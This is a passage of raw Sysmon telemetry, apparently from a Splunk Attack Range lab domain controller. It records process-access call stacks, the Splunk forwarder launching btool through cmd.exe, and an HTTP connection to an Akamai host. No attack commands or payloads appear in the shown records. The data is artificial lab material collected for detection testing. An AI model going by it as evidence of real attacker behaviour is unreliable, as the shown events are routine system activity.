12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.213{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-64ED-6064-D000-00000000AE01}65845048C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.213{266CAFBE-64ED-6064-D100-00000000AE01}5472C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk 
ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-64ED-6064-CF00-00000000AE01}55726640C:\Windows\system32\cmd.exe{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
154100x80000000000000008070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.206{266CAFBE-64ED-6064-D000-00000000AE01}6584C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000008069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:53.197{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.197{266CAFBE-64E9-6064-C000-00000000AE01}67366740C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:53.201{266CAFBE-64ED-6064-CF00-00000000AE01}5572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64E9-6064-C000-00000000AE01}6736C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2796 354300x80000000000000008233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:52.995{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53597-false104.117.196.27a104-117-196-27.deploy.static.akamaitechnologies.com80http 10341000x80000000000000008232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:54.740{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.740{266CAFBE-64EE-6064-E300-00000000AE01}63246328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-E400-00000000AE01}6464C:\Program 